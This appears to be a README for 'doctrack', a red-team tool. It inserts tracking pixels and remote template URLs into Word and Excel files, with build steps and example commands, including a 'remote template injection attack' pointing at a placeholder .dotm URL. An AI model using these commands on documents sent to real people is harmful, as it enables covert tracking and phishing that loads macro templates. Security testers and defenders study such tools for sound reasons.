Doctrack | Tool To Manipulate And Insert Tracking Pixels Into Office Open XML Documents (Word, Excel)


Tool to manipulate and insert tracking pixels into Office Open XML documents.


  • Insert tracking pixels into Office Open XML documents (Word and Excel)
  • Inject template URL for remote template injection attack
  • Inspect external target URLs and metadata
  • Create Office Open XML documents (#TODO)


You will need to download .Net Core SDK for your platform. Then, to build single binary on Windows:

$ git clone$ cd doctrack/$ dotnet publish -r win-x64 -c Release /p:PublishSingleFile=true

On Linux:

$ dotnet publish -r linux-x64 -c Release /p:PublishSingleFile=true


$ doctrack --helpTool to manipulate and insert tracking pixels into Office Open XML documents.Copyright (C) 2020 doctrack  -i, --input         Input filename.  -o, --output        Output filename.  -m, --metadata      Metadata to supply (json file)  -u, --url           URL to insert.  -e, --template      (Default: false) If set, enables template URL injection.  -t, --type          Document type. If --input is not specified, creates new                      document and saves as --output.  -l, --list-types    (Default: false) Lists available types for document                      creation.  -s, --inspect       (Default: false) Inspect external targets.  --help              Display this help screen.

Available document types listed below. If you want to insert tracking URL just use either Document or Workbook types, other types listed here are only for document creation (#TODO).

$ doctrack --list-typesDocument              (*.docx)MacroEnabledDocument  (*.docm)MacroEnabledTemplate  (*.dotm)Template              (*.dotx)Workbook              (*.xlsx)MacroEnabledWorkbook  (*.xlsm)MacroEnabledTemplateX (*.xltm)TemplateX             (*.xltx)

Insert tracking pixel and change document metadata:

$ doctrack -t Document -i test.docx -o test.docx --metadata metadata.json --url http://test.url/image.png

Insert remote template URL (remote template injection attack), works only with Word documents:

$ doctrack -t Document -i test.docx -o test.docx --url http://test.url/template.dotm --template

Inspect external target URLs and metadata:

$ doctrack -t Document -i test.docx --inspect[External targets]Part: /word/document.xml, ID: R8783bc77406d476d, URI: http://test.url/image.pngPart: /word/settings.xml, ID: R33c36bdf400b44f6, URI: http://test.url/template.dotm[Metadata]Creator:Title:Subject:Category:Keywords:Description:ContentType:ContentStatus:Version:Revision:Created: 13.10.2020 23:20:39Modified: 13.10.2020 23:20:39LastModifiedBy:LastPrinted: 13.10.2020 23:20:39Language:Identifier: